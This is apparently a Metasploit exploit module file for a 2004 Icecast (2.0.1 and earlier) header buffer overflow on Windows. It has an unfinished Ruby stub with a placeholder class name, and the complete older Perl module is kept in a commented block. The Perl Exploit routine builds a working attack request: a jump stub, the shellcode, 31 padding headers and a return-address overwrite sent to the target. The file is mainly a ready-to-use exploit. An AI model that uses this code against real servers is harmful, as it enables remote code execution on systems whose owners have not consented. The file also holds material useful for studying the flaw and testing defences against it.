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204 lines
5.4 KiB
Ruby
204 lines
5.4 KiB
Ruby
require 'msf/core'
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module Msf
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class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
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include Exploit::Remote::Tcp
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def initialize(info = {})
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super(update_info(info,
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'Name' => 'Icecast (<= 2.0.1) Header Overwrite (win32)',
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'Description' => %q{
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This module exploits a buffer overflow in the header parsing
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of icecast, discovered by Luigi Auriemma. Sending 32 HTTP
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headers will cause a write one past the end of a pointer
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array. On win32 this happens to overwrite the saved
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instruction pointer, and on linux (depending on compiler,
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etc) this seems to generally overwrite nothing crucial (read
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not exploitable).
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!! This exploit uses ExitThread(), this will leave icecast
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thinking the thread is still in use, and the thread counter
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won't be decremented. This means for each time your payload
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exists, the counter will be left incremented, and eventually
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the threadpool limit will be maxed. So you can multihit,
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but only till you fill the threadpool.
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},
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'Author' => [ 'spoonm', 'Luigi Auriemma <aluigi@autistici.org> (bug and exploit info)' ],
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'Version' => '$Revision$',
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'References' =>
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[
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[ 'OSVDB', '10406'],
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[ 'BID', '11271'],
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[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html'],
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[ 'MIL', '25'],
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],
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'Privileged' => false,
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'Payload' =>
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{
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'Space' => 2000,
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'BadChars' => "\x0d\x0a\x00",
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},
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'Targets' =>
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[
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[
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'Automatic Targetting',
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{
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'Platform' => 'win32, win2000, winnt, winxp, win2003',
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'Ret' => 0x0,
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},
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],
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],
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'DisclosureDate' => 'Sep 28 2004',
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'DefaultTarget' => 0))
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end
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def exploit
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connect
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handler
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disconnect
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end
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=begin
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##
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# This file is part of the Metasploit Framework and may be redistributed
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# according to the licenses defined in the Authors field below. In the
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# case of an unknown or missing license, this file defaults to the same
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# license as the core Framework (dual GPLv2 and Artistic). The latest
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# version of the Framework can always be obtained from metasploit.com.
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##
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package Msf::Exploit::icecast_header;
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use strict;
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use base 'Msf::Exploit';
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use Msf::Socket::Tcp;
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use Pex::Text;
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my $advanced = {
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'LessTraffic' => [0, 'Use smaller (but less real looking) http headers'],
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};
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my $info = {
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'Name' => 'Icecast (<= 2.0.1) Header Overwrite (win32)',
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'Version' => '$Revision$',
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'Authors' =>
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[
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'spoonm <ninjatools [at] hush.com>',
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'Luigi Auriemma <aluigi [at] autistici.org> (bug and exploit info)',
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],
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'Arch' => [ 'x86' ],
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'OS' => [ 'win32', 'win2000', 'winnt', 'winxp', 'win2003' ],
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'Priv' => 0,
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'AutoOpts' => { 'EXITFUNC' => 'thread' },
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'UserOpts' =>
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{
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'RHOST' => [1, 'ADDR', 'The target address'],
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'RPORT' => [1, 'PORT', 'The target port', 8000],
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},
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'Payload' =>
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{
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'Space' => 2000,
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'BadChars' => "\r\n\x00",
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'MinNops' => 0,
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'MaxNops' => 0, # nops are for slackers.
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},
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'Description' => Pex::Text::Freeform(qq{
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This module exploits a buffer overflow in the header parsing of icecast,
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discovered by Luigi Auriemma. Sending 32 HTTP headers will cause a write
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one past the end of a pointer array. On win32 this happens to overwrite
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the saved instruction pointer, and on linux (depending on compiler, etc)
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this seems to generally overwrite nothing crucial (read not exploitable).
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!! This exploit uses ExitThread(), this will leave icecast thinking the
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thread is still in use, and the thread counter won't be decremented. This
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means for each time your payload exists, the counter will be left
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incremented, and eventually the threadpool limit will be maxed. So you
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can multihit, but only till you fill the threadpool.
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}),
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'Refs' =>
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[
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[ 'OSVDB', '10406' ],
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[ 'BID', '11271' ],
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[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html' ],
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[ 'MIL', '25' ],
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],
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'Keys' => ['icecase'],
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'DisclosureDate' => 'Sep 28 2004',
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};
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sub new {
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my $class = shift;
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my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
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return($self);
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}
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# Interesting that ebp is pushed after the local variables, and the line array
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# is right before the saved eip, so overrunning it just by 1 element overwrites
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# eip, making an interesting exploit....
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# .text:00414C00 sub esp, 94h
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# .text:00414C06 push ebx
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# .text:00414C07 push ebp
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# .text:00414C08 push esi
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sub Exploit {
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my $self = shift;
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my $targetHost = $self->GetVar('RHOST');
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my $targetPort = $self->GetVar('RPORT');
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my $targetIndex = $self->GetVar('TARGET');
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my $encodedPayload = $self->GetVar('EncodedPayload');
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my $shellcode = $encodedPayload->Payload;
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my $sock = Msf::Socket::Tcp->new(
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'PeerAddr' => $targetHost,
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'PeerPort' => $targetPort,
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);
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if($sock->IsError) {
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$self->PrintLine('Error creating socket: ' . $sock->GetError);
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return;
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}
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# bounce bounce bouncey bounce.. (our chunk gets free'd, so do a little dance)
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# jmp 12
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my $evul = "\xeb\x0c / HTTP/1.1 $shellcode\r\n";
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# look somewhat realistic, or something..
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# because our above http verb looks so convincing...
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if($self->GetLocal('LessTraffic')) {
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$evul .= " \r\n" x 31;
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}
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else {
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$evul .= "Accept: text/html\r\n" x 31;
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}
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# jmp [esp+4]
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$evul .= "\xff\x64\x24\x04\r\n";
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$evul .= "\r\n";
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$sock->Send($evul);
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return;
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}
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1;
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=end
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end
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end
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